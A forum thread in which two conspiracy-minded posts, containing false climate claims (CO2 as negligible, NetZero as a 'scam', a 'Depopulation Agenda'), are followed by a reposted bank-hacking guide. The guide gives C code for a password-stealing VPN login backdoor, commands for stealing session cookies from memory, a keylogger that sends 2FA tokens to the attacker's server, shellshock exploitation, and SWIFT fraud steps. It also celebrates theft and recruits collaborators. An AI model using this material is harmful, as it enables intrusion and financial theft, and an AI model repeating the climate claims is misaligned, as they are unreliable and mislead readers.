
Thread: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

  1. Link to Post #1
    ExomatrixTV (Avalon Member, Netherlands)


    "Crowdsourcing" does not only have to mean to get financial funding/support ... you can also collect vital intel ... collect new key-data ... collect new valuable research (from crowd) sources.
    When you consider and want to know and take full responsibility for your quality of thinking not depending on any corrupt "authorities" doing the thinking for you, is something completely different from being a "believer" or "non-believer" >>> as most "non-believers" have the false assumption it is "just a belief" and refuse to consider anything controversial from the get-go.

    They rather "fit in" any mainstream sold narrative that is spoon-fed to them. Practicing discernment-skills can never be spoon-fed by anything that comes close to being corrupt.
    • When you have real evidence of corruption, they will most likely accuse you of spreading "fringe conspiracy theories", not realizing that having a "conspiracy theory" is not that different to having a crime theory ... so who benefits if crime theories are not investigated through crowdsourcing networking cross-referencing multiple angles & multiple perceptions of the same crime theory ...
    Expanding of man-power networking is exactly what they are afraid of ... because almost everybody can have an important piece of the puzzle, when combined it can speed up the mounting of correct evidence & proof that is needed to eventually come to a certain conclusion. This takes a lot of effort & time, what most "non-believers" (and even "believers") will never do.

    This whole process of multi-layer investigations is sadly enough often doomed to be infiltrated by (multiple) decoys, distractions, dis-info agents planting false evidence later used to dismiss the whole thing ... add "making mistakes" which can happen to the best of us and the mainstream-media demonization process will start!

    "Fact-checkers sites" (often funded directly or indirectly by corrupt billionaire philanthropists), are happy to use planted false evidence & human mistakes as their bases to accuse you "spreading harmful misinformation". <<< most do not know that these claims are based upon inserted dis-info to distract the common people what is really going on plus using own provable misinformation on top of it with countless false assumptions.
    • Anyone that tries to explain the above will be dismissed without researching anything. They solely rely on "authorities" telling them how to think & judge, and they even feel good about it.
    Sadly enough, many gullible "good people" fall for these PsyOp tactics, until they see more and more that those "controversial conspiracy researchers" are actually "crowdsourcing crime theorists network" >>> a network of often highly intelligent & smart people helping each-other to get to the bottom of things that mainstream media FAILS to do over and over and over and over again.

    And those "crowdsourcing crime theorists network" can predict controversial events much better and more accurately than all mainstream pushed corporate "think tanks" combined.

    More "new normal" people are starting to see it too <<< that is why they need to implement mass-censorship which was once just a "crazy conspiracy theory" but nowadays rampant mass censorship is mainstream accepted knowledge even encouraged by mass media, deep-state liberals and deep-state republicans!

    Tyranny & Authoritarianism sold as "good" all in the open! ... If you could record all the current mainstream propaganda and show it to people before 2020 they would never have believed it ... but that is the whole thing it was/is never about "believe" in the first place ... much more about having courage to go beyond the mass conditioning ... which a lot of people already did but never considered by "good people" blindly following "authorities" talking points spoon-fed to them 24/7.
    • The quality of any "authoritative" skeptic selected & pushed forward by mainstream media can be best measured in his or her ability to make an honest representation of that of what they attack. (spoiler alert: they can't).
    How correct their alleged "summaries" are determines how good they are understanding other points of view, other perceptions & perspectives that challenge their heavily guarded (WEF) narratives aka propaganda talking points.

    If you are a neutral person, you always have to ask: ... Do I trust this mainstream pushed "authoritative" skeptic talking-head ... to be honest in how he or she represents "the other", is it an open honest debate? ... is there room for corrections? ... are rebuttals allowed? ... do they allow a real vindication process if it warrants later on? ... now the fun-fact: nowadays since the Corona Hysteria in 2020 started, it is not allowed anymore ... you are demanded to blindly trust them … that is the "new normal" normalizing insanity 24/7 defying common sense & logic ... Lucky for us, more and more people are finally starting to see the madness & insanity too.
    • Having a conspiracy theory is not that different from having a crime theory ... so who exactly benefits if certain crime theories are not further investigated and systematically downplayed & marginalized?
    * If a conspiracy is (partly) in the open does NOT make it any less criminal nor less harmful.



    Almost every conspiracy researcher will have besides verifiable facts & evidence: theories & different insights that yet have to be proven ... The percentage of his or her work that uses: speculations, theories, assumptions, conjecture varies person to person ...

    Some use these to have a "story-line" about a controversial topic that "only makes sense" if these speculations, theories, assumptions are correct ... That explains why some of them talk as if it is already proven without having any real proof nor evidence. They often ask or expect you to go along with their beliefs, conjecture, story-lines, speculations, assumptions and may get annoyed or even angry if you ask for (or demand) proof or evidence of their claims we can study.

    The thing is SOME of it indeed can eventually be proven with evidence and some of it still awaits vindication, so you have to have patience ... but some of it will never be proven because it is literally made up to make it sound "believable" or "more interesting" or "more credible" but turned out to be the opposite!

    When certain conspiracy researchers expect you to "go along" with a certain strain of thoughts and reasoning "to make sense" of a controversial topic, they tend to say: "you know?" or "right?" or "okay?" way too many times, especially when they are interviewed.

    I wish people would stop saying during controversial interviews: "you know?", "right?" and "okay?" every minute! ... Sometimes even every 15 seconds.
    • Why do I wish people would stop asking for confirmation all the time during controversial interviews?
    Because a lot of what is claimed can not (easily) be verified ... It is more than often second hand insights, stories & claims mixed with assumptions & conjecture. Just because multiple independent sources claim the same or similar things, is not a reason to be 100% sure.

    * just because you have psychic abilities (as I have them too!) does not make it "flawless".

    It is okay to have certain perspectives as long as you do not sell it as "absolute" ... When people are insecure, they may over-shout themselves to compensate for their lack of confidence.

    To live in self-honesty, you have to allow space to be corrected if need be... even when it never happens, you still allow others to see more than just one way of thinking.

    When you speculate, that's perfectly fine as long as you say it is just that. But so many start "brainstorming" in their heads of so many possible scenarios - possible motives - possible end-goals - possible tactics & mind-games that indeed are ALL possible <<< but that does not mean it is happening the way you think it is.
    • We can project our fears, expectations, doom scenarios, transformations, hopes, pessimism, optimisms all wrapped in a "coherent" story seeking like-minded spirits to help co-create (manifest) that what we want to see happening or prevent from happening. But at the same time, when you are doing that, you INJECT many assumptions in to the psyche of others. Now you see why I have issues with people saying: "you know?", "right?", "okay?" dozens of times per hour! ... Because it is not always "okay" nor "right" nor "knowing".
    Especially when it is highly controversial. No need to "believe" anything, rather ask people to consider different points of view different perspectives to broaden the horizon of possibilities, nothing more.



    cheers,
    John Kuhles aka 'ExomatrixTV'
    March 22nd, 2023 🦜🦋🌳
    Last edited by ExomatrixTV; 24th March 2023 at 12:27.
    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

  2. The Following 9 Users Say Thank You to ExomatrixTV For This Post:

    East Sun (22nd March 2023), edina (22nd March 2023), Ewan (23rd March 2023), Harmony (23rd March 2023), mizo (23rd March 2023), NancyV (22nd March 2023), Orph (22nd March 2023), ronny (23rd March 2023), Sunny-side-up (23rd March 2023)

  3. Link to Post #2
    ExomatrixTV (Avalon Member, Netherlands)


    And there are more trees growing faster when there is more CO2 in the air (ppm - parts per million) ... and the only real climate change effect on all planets in our solar system is due to the 11-year cyclical Solar Storms highs & lows <<< that effect is so big, so huge that the transparent "CO2" part affecting the climate is below 0,001% in comparison ...

    When the Sun is making all Oceans & Seas (±70% of the Earth Surface which is 2 times the size of all countries on earth combined) create clouds THAT REAL CLIMATE CHANGE PROCESS can never ever be stopped ... not even with banning CO2 completely everywhere (what plants breathe ffs).

    * Cosmic Gamma Rays hitting The Earth are ALSO part of having gigantic Climate Change Effects they do not want you to discuss ... because it will also crush their tunnel vision (WEF) narratives.

    "NetZero2050" is a TOTAL SCAM as it will lead to plants having less to breathe and will do the opposite of "greening the planet" ... One of the Green Peace Founders said that the "Green Movement" is totally hijacked by unelected tyrannical Technocrats that seek excuses to impose & drastically change political systems.

    They need a perfect excuse to "justify" bypassing current laws ... and PUSH all kinds of unconstitutional actions, and most people have no clue how they are being played/used, ... when they ever find out ... the harm is already done on a supermassive scale, and it only could happen if they believed the lies sold to them. So so sad.

    Truly understanding what "Self-Determination Rights" are ... is KNOWING it is the exact opposite of what WEF minions are doing worldwide with their Technocratic Tyrannical Dystopian "Global Governance" aka "Agenda2030" & "NetZero2050"

    Maybe the Ultra Elite KNOWS real abundance is coming for humanity ... and know that eventually they lose control over the masses ... thus they are in a big hurry to speed up the Depopulation Agenda and implement all kinds of unconstitutional "(fake) crisis" laws cementing their Future Dystopia aka Agenda2030 & "NetZero2050".

    cheers,
    John 🦜🦋🌳

    * source

    How to be a "Good Citizen":


    * Obey without questioning.
    * Comply without thinking.
    * Worship authority.
    * Have blind faith in government.
    * Have absolute trust in mainstream media.
    * Never question official narratives.

    ... and how to make sure others know you do all the above?
    * Wear a face diaper, you know it does not even work.

    * Would Abuse of Power on a Massive Scale be Possible Without These 25 Points?
    Last edited by ExomatrixTV; 22nd March 2023 at 21:20.

  4. The Following 6 Users Say Thank You to ExomatrixTV For This Post:

    East Sun (22nd March 2023), Ernie Nemeth (22nd March 2023), Ewan (23rd March 2023), Harmony (23rd March 2023), NancyV (22nd March 2023), ronny (23rd March 2023)

  5. Link to Post #3
    Blastolabs (Avalon Member, Aaland)


    The best real world example I am familiar with is Phineas Phisher.

    Why?

    Well in just a few weeks of human perceived time he hacked the CIA, hacked the NSA, then stole a couple hundred thousand dollars from a bank in the Cayman Islands

    Why?

    Quote:
    Make no mistake, expropriation is not theft. It is not the confiscation of money earned "with the sweat of the forehead". It is not theft of private property. It is, rather, the recovery of enormous amounts of land and wealth that have been forged with stolen natural resources, human slavery, forced labor force and amassed in hundreds of years by a small minority. This wealth ... is illegitimate, both for moral purposes and for the exploitation mechanisms that have been used to create it.
    For Colin, the first step is that “we have to free ourselves from our mental ties (believing that wealth and private property have been earned by those who monopolize them; and that, therefore, they should be something to respect, revere, and even something to pursue), open our minds, study and learn from history, and recognize this illegitimacy together”. Here are some books that have helped me with this: [7] [8] [9] [10] [11].

    According to Barack Obama, economic inequality is "the challenge that defines our time." Computer hacking is a powerful tool to combat economic inequality.

    The former director of the NSA, Keith Alexander, agrees and says that hacking is responsible for "the greatest transfer of wealth in history."

     ______________________________
    / The story is ours            \
    \ and it is done by hackers!   /
     ------------------------------
            \
             \ ^__^
               (oo)\_______
            (  (__)\       )\/\
             _) /  ||----w |
            (.)/   ||     ||
             `'

    Everyone together, now and forever!

    [1] https://sursiendo.com/docs/Pensar_de...omunes_web.pdf
    [2] https://chomsky.info/commongood02/
    [3] The Will to Change: Men, Masculinity, and Love
    [4] their own religion is very clear about this: https://dailyverses.net/es/materialismo
    [5] https://elpulso.hn/la-filantropia-en...l-capitalismo/
    [6] http://www.hamptoninstitution.org/ex...n-or-bust.html
    [7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era de los Dioses Enmascarados y los Reyes Cubiertos
    [8] Calibán y la Bruja
    [9] En deuda: Una historia alternativa de la economía
    [10] La otra historia de los Estados Unidos
    [11] Las venas abiertas de América Latina


    why/HOW?

    Code:
            _______________________________
           < Our weapons are our keyboards >
            --------------------------------
                      \
                       \ ^__^
                         (oo)\_______
                      (  (__)\       )\/\
                       _) /  ||----w |
                      (.)/   ||     ||
                       `'    ^^     ^^
     [2 - Introduction]
    This guide explains how I hacked the Cayman Bank and Trust Company (Isle of Man).  Why am I publishing this, almost four years later?
     1) To show what is possible
    Hackers working for social change have limited themselves to developing security and privacy tools, DDoS, performing vandalism and leaks. Wherever you go, there are radical projects for a social change in a complete state of precariousness, and there would be much that they could do with some expropriated money. At least for the working class, bank robbery is something socially accepted, and those who do are seen as heroes of the people. In the digital age, robbing a bank is a non-violent, less risky act, and the reward is greater than ever. So why are only black hat hackers doing it for their personal benefit, and never hacktivists to finance radical projects? Maybe they don't think they are capable of doing it. The big bank hacks are on the news every so often, such as the hacking of the Bank of Bangladesh [1], which was attributed to North Korea, or the hacking of banks attributed to the Carbanak group [2], which they describe as a very large and well organized group of Russian hackers, with different members who would be specialized in different tasks. But, it is not that complicated.
    
    It is because of our collective belief that the financial system is unquestionable that we exercise control over ourselves, and maintain the class system without those above having to do anything [3]. Being able to see how vulnerable and fragile the financial system really is helps us break that collective hallucination. That is why banks have a strong incentive not to report hacks, and to exaggerate how sophisticated the attackers are. None of the financial hacks I made, or those I've known, have ever been reported. This is going to be the first, and not because the bank wanted to, but because I decided to publish it.
    
    As you are about to learn in this home guide, hacking a bank and transferring money through the SWIFT network does not require the support of any government or a large and specialized group.  It is something totally possible being a mere amateur hacker, with only public tools and basic knowledge of how to write a script.
    [1] https://elpais.com/economia/2016/03/...94_374693.html 
    [2] https://securelist.lat/el-gran-robo-...arbanak/67508/ 
    [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural 
     2) Help withdraw cash
    Many of those who read this already have, or with a little study will be able to acquire, the skills needed to carry out a hack like this. 
    However, many will find that they lack the necessary criminal connections to get the handles in condition. In my case, this was the first bank that I hacked, and at that time I only had a few and mediocre accounts ready to withdraw the cash (known as bank drops), so it was only a few hundred thousand that I could withdraw at total, when it is normal to get millions. Now, on the other hand, I do have the knowledge and connections to get cash more seriously, so if you are hacking a bank but need help to convert that into real money, and you want to use that money to finance radical social projects, you can contact me.
    
     3) Collaborate
    It is possible to hack banks as an amateur who works alone, but the net is that, in general, it is not as easy as I paint it here.  I was lucky with this bank for several reasons:
    1. It was a small bank, so it took me much less time to understand how everything worked.
    2. They had no procedure to check the sent swift messages.  Many banks have one, and you need to write code to hide your transfers from their monitoring system.
    3. They only used password authentication to access the application with which they connected to the SWIFT network. Most banks now use RSA SecurID, or some form of 2FA.  You can skip this by typing code to get an alert when your token enters, so you can use it before it expires. It's simpler than it seems: I used Get-Keystrokes [1], modifying it so that instead of storing the pressed keys, a GET request is made to my server every time it is detected that they have entered a username. This request adds the username to the url and, as they type the token, several GETs are made with the token digits concatenated to the url. On my side I leave this running in the meantime:
      ssh me@my_secret_server 'tail -f /var/log/apache2/access_log'
        | while read i; do echo $i; aplay alarma.wav &> /dev/null; done
     If it is a web application, you can skip the 2FA by stealing the cookie after they have authenticated. I am not an APT with a team of coders who can make me customized tools. I am a simple person who subsists on what the terminal gives [2], so what I use is:
    procdump64 /accepteula -r -ma PID_of_browser
     strings64 /accepteula * .dmp |  findstr PHPSESSID 2> nul
     or going through findstr rather than strings, which makes it much faster:
    findstr PHPSESSID * .dmp> tmp
         strings64 /accepteula tmp |  findstr PHPSESSID 2> nul
    
    Another way to skip it is to access your session with a hidden VNC (hvnc) after they have authenticated, or with a little creativity you could also focus on another part of their process instead of sending SWIFT messages directly.
    
    I think that if I collaborated with other experienced bank hackers we could hack hundreds of banks like Carbanak, instead of doing one from time to time on my own.  So if you have experience with similar hacks and want to collaborate, contact me.  You will find my email and my PGP key at the end of the previous guide [3].
    
    [1] https://github.com/PowerShellMafia/P...Keystrokes.ps1
    [2] https://lolbas-project.github.io/
    [3] https://www.exploit-db.com/papers/41914
    ________________________________________
    / If robbing a bank could change things, \
    \ they’d make it illegal.                /
     ----------------------------------------
             \
              \ ^__^
                (oo)\_______
             (  (__)\       )\/\
              _) /  ||----w |
             (.)/   ||     ||
    
    
    [3 - Be careful out there]
    It is important to take some simple precautions. I will refer to this same section of my last guide [1], since it seems to work just fine [2]. All I have to add is that, in Trump's words, "Unless you catch hackers in the act, it is difficult to determine who was doing the hacking," so the police are getting more and more creative [3][4] in their attempts to grab criminals in the act (when their encrypted hard drives are unlocked). So it would be nice if for example you carry a certain bluetooth device and configure your computer to turn off when it moves beyond a certain range, or when an accelerometer detects movement, or something like that. It may be that writing long articles detailing your actions and your ideology is not the safest thing in the world (oops!), but at times I feel I have to.

    If I didn't believe in who listens to me
    If I didn't believe in what hurts
    If I didn't believe in what's left
    If I didn't believe in what I fought
    What a thing ...
    What was the club without a quarry?

    [1] https://www.exploit-db.com/papers/41914
    [2] https://www.wifi-libre.com/topic-126...as-fisher.html
    [3] https://www.wired.com/2015/05/silk-road-2/
    [4] https://motherboard.vice.com/en_us/a...y-arrest-video

    Many blame queer people for the decline of this society; we are proud of it
    Some believe we want to reduce to ashes this civilization and its moral fabric;
    They couldn't be more right
    They often describe us as depraved, decadent and revolting
    But alas! They haven't seen anything yet
    (https://theanarchistlibrary.org/libr...e-gay-do-crime)

    [4 - Get access]
    In another place [1] I talked about the main ways to get initial access to a company's network during a targeted attack. However, this was not a targeted attack. I did not set out to hack a specific bank, what I wanted was to hack any bank, which ends up being a much simpler task. This type of nonspecific approach was popularized by Lulzsec and Anonymous [2].
    As part of the earlier essay, I prepared an exploit and post-exploitation tools for a popular VPN device. Then I started scanning the entire internet with zmap and zgrab to identify other vulnerable devices [3]. I had the scanner save the vulnerable IPs, along with the common and alt names of the device's SSL certificate, the device's Windows domain names, and the reverse DNS lookup of the IP. I grepped the results for the word "bank", and there were plenty to choose from, but the truth is that I was attracted to the word "Cayman", and that's how I came to choose this one.

    [1] https://www.exploit-db.com/papers/41914
    [2] https://web.archive.org/web/20190329...org/0x0098.png
    [3] https://github.com/zmap/zmap

    [4.1 - The Exploit]
    When I published my latest DIY guide [1] I did not reveal the details of the sonicwall exploit that I had used to hack Hacking Team, as it was very useful for other hacks (such as this one) and I still had not finished having fun with it. Determined then to hack Hacking Team, I spent weeks reverse engineering their sonicwall ssl-vpn model, and even managed to find several memory corruption vulnerabilities that were more or less difficult to exploit, before I realized that the device was easily exploitable with shellshock [2]. When shellshock came out, many sonicwall devices were vulnerable, with only a request to cgi-bin/welcome and a payload in the user-agent. Dell released a security update and an advisory for these versions. The version used by Hacking Team and this bank had the vulnerable bash version, but the cgi requests did not trigger the shellshock- except for the requests to a shell script, and there was one accessible: cgi-bin/jarrewrite.sh. This seems to have escaped Dell's notice, since they never released a security update or an advisory for that version of the sonicwall. And, kindly, Dell had setuid’d root on dos2unix, leaving the device easy to root.
In my last guide many read that I spent weeks researching a device until I found an exploit, and assumed that it meant that I was some kind of elite hacker. The reality, that is, the fact that it took me two weeks to realize that it was trivially exploitable with shellshock, is perhaps less flattering to me, but I think it is also more inspiring. Shows that you can really do this for yourself. You don't need to be a genius, I certainly am not. Actually my work against Hacking Team started a year earlier. When I discovered Hacking Team and the Gamma Group in the CitizenLab investigations [3][4], I decided to explore a bit and see if I could find anything. I didn't get anywhere with Hacking Team, but I was lucky with Gamma Group, and I was able to hack their customer support portal with basic sql injection and file upload vulnerabilities [5][6]. However, although the customer support server gave me a pivot towards the internal network of Gamma Group, I was unable to penetrate further into the company.
    From this experience with the Gamma Group and other hacks, I realized that I was really limited by my lack of knowledge about privilege escalation and lateral movement in windows domains, active directory and windows in general. So I studied and practiced (see section 11), until I felt I was ready to pay a visit to Hacking Team almost a year later. The practice paid off, and this time I was able to make a complete commitment from the company [7]. Before I realized that I could enter with shellshock, I was willing to spend happy whole months of life studying exploit development and writing a reliable exploit for one of the memory corruption vulnerabilities I had encountered. I just knew that Hacking Team needed to be exposed, and that it would take me as much time as necessary and learn what I had to learn to get it. To perform these hacks you don't need to be bright. You don't even need great technical knowledge. You just need dedication, and believe in yourself.
    [1] https://www.exploit-db.com/papers/41914
    [2] https://es.wikipedia.org/wiki/Shells...or_de_software)
    [3] https://citizenlab.ca/tag/hacking-team/
    [4] https://citizenlab.ca/tag/finfisher/
    [5] https://theintercept.com/2014/08/07/...ng-protesters/
    [6] https://www.exploit-db.com/papers/41913
    [7] https://web.archive.org/web/20150706...om/hackingteam

    [4.2 - The Backdoor]
    Part of the backdoor I prepared for Hacking Team (see the first footnote in section 6) was a simple wrapper on the login page to capture passwords:

    #include <stdio.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <string.h>
    #include <stdlib.h>

    int main()
    {
            char buf[2048];
            int nread, pfile;

            /* pull the log if we send a special cookie */
            char *cookies = getenv("HTTP_COOKIE");
            if (cookies && strstr(cookies, "our private password")) {
                    write(1, "Content-type: text/plain\n\n", 26);
                    pfile = open("/tmp/.pfile", O_RDONLY);
                    while ((nread = read(pfile, buf, sizeof(buf))) > 0)
                            write(1, buf, nread);
                    exit(0);
            }

            /* the parent stores the POST data and sends it to the child, which is the actual login program */
            int fd[2];
            pipe(fd);
            pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
            if (fork()) {
                    close(fd[0]);

                    while ((nread = read(0, buf, sizeof(buf))) > 0) {
                            write(fd[1], buf, nread);
                            write(pfile, buf, nread);
                    }

                    write(pfile, "\n", 1);
                    close(fd[1]);
                    close(pfile);
                    wait(NULL);
            } else {
                    close(fd[1]);
                    dup2(fd[0],0);
                    close(fd[0]);
                    execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin", "userLogin", NULL);
            }
    }

    In the case of Hacking Team, they were logging on to the VPN with single-use passwords, so the VPN gave me access only to the network, and from there it took an extra effort to get domain admins on their network. In the other guide I wrote about side passes and privilege escalation in windows domains [1]. In this case, on the other hand, it was the same Windows domain passwords that were used to authenticate against the VPN, so I could get a good user password, including that of the domain admin.
    Now I had full access to his network, but usually this is the easy part. The most complicated part is to understand how they operate and how to get what you want out of their network.

    [1] https://www.exploit-db.com/papers/41914

    [4.3 - Fun facts]
    Following the investigation they did about the hacking, I found it interesting to see that, by the same time I did it, the bank could have been compromised by someone else through a targeted phishing email [1]. As the old saying goes, "give a man an exploit and he will have access for a day, teach phishing and he will have access all his life" [2]. The fact that someone else, by chance and at the same time as me, put this small bank in the spotlight (they registered a domain similar to the real domain of the bank to be able to phish from there) suggests that bank hacks occur much more frequently than is known. A fun suggestion for you to follow the investigations of your hacks is to have a backup access, one that you won't touch unless you lose normal access. I have a simple script that expects commands once a day, or less, just to maintain long-term access in case they block my regular access. Then I had a powershell empire [3] calling home more frequently to a different IP, and I used empire to launch meterpreter [4] against a third IP, where I did most of my work. When PWC started investigating the hacking, they found my use of empire and meterpreter and cleaned those computers and blocked those IPs, but they didn't detect my backup access. PWC had placed network monitoring devices, in order to analyze the traffic and see if there were still infected computers, so I didn't want to connect much to their network. I only launched mimikatz once to get the new passwords, and from there I could continue my research by reading their emails in the outlook web access.
    [1] page 47, Project Pallid Nutmeg.pdf, in torrent
    [2] https://twitter.com/thegrugq/status/563964286783877121
    [3] https://github.com/EmpireProject/Empire
    [4] https://github.com/rapid7/metasploit-framework

    [5 - Understand Banking Operations]
    To understand how the bank operated, and how I could get money, I followed the techniques that I summarized in [1], in section “13.3 - Internal Recognition”. I downloaded a list of all file names, grepped for words like "SWIFT" and "transfer", and downloaded and read all files with interesting names. I also looked for emails from employees, but by far the most useful technique was to use keyloggers and screenshots to see how bank employees worked. I didn't know it at the time, but for this, Windows has a very good monitoring tool [2]. As described in technique no. 5 of section 13.3 in [1], I made a capture of the keys pressed throughout the domain (including window titles), I did a grep in search of SWIFT, and found some employees opening ‘SWIFT Access Service Bureau - Logon’. For those employees, I ran meterpreter as in [3], and used the post/windows/gather/screen_spy module to take screenshots every 5 seconds, to see how they worked. They were using a remote citrix app from the bottomline company [4] to access the SWIFT network, where each payment message SWIFT MT103 had to go through three employees: one to "create" the message, one to "verify" it, and another to "authorize it." Since I already had all their credentials thanks to the keylogger, I could easily perform all three steps myself. And from what I knew after seeing them work, they didn't review the SWIFT messages sent, so I should have enough time to get the money from my bank drops before the bank realized and tried to reverse the transfers.
    [1] https://www.exploit-db.com/papers/41914
    [2] https://cyberarms.wordpress.com/2016...th-metasploit/
    [3] https://www.trustedsec.com/blog/no_psexec_needed/
    [4] https://www.bottomline.com/uk/produc...ccess-services

     _______________________________________
    / Whoever robs a thief, gets 100 years \
    \ of forgiveness.                       /
     ---------------------------------------
            \
             \ ^__^
               (oo)\_______
            (  (__)\       )\/\
             _) /  ||----w |
            (.)/   ||     ||
             `'

    [6 - Send the money]
    I had no idea what I was doing, so I was discovering it along the way. Somehow, the first transfers I sent went well. The next day, I screwed up by sending a transfer to Mexico that ended my fun. This bank sent its international transfers through its correspondent account in Natwest. I had seen that the correspondent account for transfers in pounds sterling (GBP) appeared as NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The Mexican transfer was in GBP, so I assumed that I had to put NWBKGB2LGPL as a correspondent. If I had prepared it better I would have known that the GPL instead of XXX indicated that the payment would be sent through the UK Fast Payment Service, rather than as an international transfer, which obviously will not work when you are trying to send money to Mexico. So the bank got an error message. On the same day I also tried to send a payment of £200k to the UK using NWBKGB2LGPL, which was not made because 200k exceeded the shipping limit by fast payments, and would have had to use NWBKGB2LXXX instead. They also received an error message for this. They read the messages, investigated it, and found the rest of my transfers.

    [7 - The loot]
    From what I write, you can get a complete idea of what my ideals are and to what things I give my support. But I would not like to see anyone in legal trouble for receiving expropriated funds, so not another word of where the money went.
    I know that journalists are probably going to want to put some number on how many dollars were distributed in this hack and similar ones, but I prefer not to encourage our perverse habit of measuring the actions just by their economic value. Any action is admirable if it comes from love and not from the ego. Unfortunately those above, the rich and powerful, public figures, businessmen, people in "important" positions, those that our society most respects and values, those have been placed where they are based on acting more from the ego than from love. It is in the simple, humble and "invisible" people that we should look at and whom we should admire.

    [8 - Cryptocurrencies]
    Redistributing expropriated money to Chilean projects seeking positive social change would be easier and safer if those projects accepted anonymous donations via cryptocurrencies such as monero, zcash, or at least bitcoin. It is understood that many of these projects have an aversion to cryptocurrencies, as they resemble some strange hypercapitalist dystopia rather than the social economy we dream of. I share their skepticism, but I think they are useful to allow donations and anonymous transactions, by limiting government surveillance and control. Same as cash, whose use many countries are trying to limit for the same reason.

    [9 - Powershell]
    In this operation, as in [1], I used a lot of powershell. Then, powershell was super cool, you could do almost anything you wanted, without antivirus detection and with very little forensic footprint. It happens that with the introduction of AMSI [2], offensive powershell is retiring. Today offensive C# is what is on the rise, with tools like [3][4][5][6]. AMSI is going to get to .NET for 4.8, so the tools in C# probably still have a couple of years left before they get dated. And then we will use C or C++ again, or maybe Delphi will become fashionable again.
    The specific tools and techniques change every few years, but basically it is not so much what changes, today hacking is essentially the same thing it was in the 90s. In fact, all the powershell scripts used in this guide and in the previous one are still perfectly usable today, after a little obfuscation of your own.

    [1] https://www.exploit-db.com/papers/41914
    [2] https://medium.com/@byte_St0rm/adven...i-25d235eb749c
    [3] https://cobbr.io/SharpSploit.html
    [4] https://github.com/tevora-threat/SharpView
    [5] https://www.harmj0y.net/blog/redteaming/ghostpack/
    [6] https://web.archive.org/web/20191114...nut-tikitorch/

     ___________________________
    / Fo Sostyn, Fo Ordaag      \
    \ Financial Sector **** Off /
     ---------------------------
            \
             \ ^__^
               (oo)\_______
            (  (__)\       )\/\
             _) /  ||----w |
            (.)/   ||     ||
             `'

    [10 - Torrent]
    Privacy for the weak, transparency for the powerful.

    Offshore banking provides executives, politicians and millionaires with privacy from their own government. Exposing them may sound hypocritical on my part, since I am generally in favor of privacy and against government oversight. But the law was already written by and for the rich: it protects its system of exploitation, with some limits (such as taxes) so that society can function and the system does not collapse under the weight of its own greed. So no, privacy is not the same for the powerful, when it allows them to evade the limits of a system designed to give them privileges; and privacy for the weak, whom it protects from a system designed to exploit them.

    Even journalists with the best intentions find it impossible to study such a huge amount of material and know what will be relevant for people in different parts of the world. When I leaked the Hacking Team files, I gave The Intercept a copy of the emails one month in advance. They found a couple of the 0days that Hacking Team was using, previously reported them to MS and Adobe and published a few stories once the leak was made public.
    There is no point of comparison with the enormous amount of articles and research that came after the complete leak to the public. Seeing it this way, and also considering the (not) editorialized publication [1] of the Panama papers, I think that a public and complete leak of this material is the right choice.

    [1] https://www.craigmurray.org.uk/archi...m-panama-leak/

    Psychologists found that those who are lower in the hierarchies tend to understand and empathize with those at the top, but vice versa is less common. This explains why, in this sexist world, many men joke about their inability to understand women, as if it were an irresolvable mystery. Explains why the rich, if they stop to think about those who live in poverty, give advice and "solutions" so alien to reality that we want to laugh. Explains why we revere executives as brave who take risks. What do they risk, beyond their privilege? If all their ventures fail, they will have to live and work like the rest of us. It also explains why there will be many who accuse me of being irresponsible and dangerous by leaking this without redaction. They feel the "danger" around an offshore bank and its customers much more intensely than they feel the misery of those dispossessed by this unfair and unequal system. And this leak of their finances, is it a danger to them, or perhaps only to their position at the top of a hierarchy that should not even exist?

    Translation: “They vilify us, these infamous people; When the only difference is that they steal from the poor, protected by the law, heaven knows, and we get the rich under the sole protection of our own courage. Don't you have to prefer to be one of us, rather than indulge those villains in search of a job? - Captain Bellamy”

    [11 - Learn to hack]
    You don't start hacking well. You start hacking ****, thinking it's good, and then gradually you get better. That is why I always say that one of the most valuable virtues is persistence.
    - Octavia Butler's advice for the APT candidate

    The best way to learn to hack is by hacking. Put together a laboratory with virtual machines and start testing things, taking a break to investigate anything you don't understand. At the very least you will want a windows server as a domain controller, another normal Windows vm attached to the domain, and a development machine with visual studio to compile and modify tools. Try to make an office document with macros that launch meterpreter or another RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying, psexec and other lateral movement techniques [1]; as well as the other scripts, tools and techniques mentioned in this guide and in the previous one [2]. At first you can disable windows defender, but then try it all by having it activated [3][4] (but deactivating the automatic sending of samples). Once you're comfortable with all that, you'll be ready to hack 99% of companies. There are a couple of things that at some point will be very useful in your learning, such as getting comfortable with bash and cmd.exe, a basic domain of powershell, python and javascript, having knowledge of kerberos [5][6] and active directory [7][8][9][10], and fluent English. A good introductory book is The Hacker Playbook.

    I also want to write a little about things to not focus on if you don't want to entertain the idea of you hacking things just because someone has told you that you are not a “real” hacker if you don't know assembly. Obviously, learn whatever interests you, but I write these lines thinking about those things that you can focus on in order to get practical results if you're looking to hack companies to filter and expropriate. A basic knowledge of web application security [11] is useful, but specializing more in web security is not really the best use of your time, unless you want to make a career in pentesting or chasing bug rewards.
CTFs, and most of the resources you'll find when looking for information about hacking, generally focus on skills such as web security, reverse engineering, exploit development, etc. These things make sense by understanding them as a way to prepare people for careers in the industry, but not for our goals. Intelligence agencies can afford to have a team dedicated to the most advanced techniques in fuzzing, a team working on exploit development with a guy investigating exclusively the new techniques of heap manipulation, etc. We don't have the time or the resources for that.
    The two most important skills for practical hacking are phishing [12] and social engineering to get initial access, and then being able to climb and move through the Windows domains.
    [1] https://hausec.com/2019/08/12/offens...eral-movement/
    [2] https://www.exploit-db.com/papers/41914
    [3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
    [4] https://www.trustedsec.com/blog/disc...-bypassing-it/
    [5] https://www.tarlogic.com/en/blog/how-kerberos-works/
    [6] https://www.tarlogic.com/en/blog/how...tack-kerberos/
    [7] https://hausec.com/2019/03/05/penetr...ectory-part-i/
    [8] https://hausec.com/2019/03/12/penetr...ctory-part-ii/
    [9] https://adsecurity.org/
    [10] https://github.com/infosecn1nja/AD-Attack-Defense
    [11] https://github.com/jhaddix/tbhm
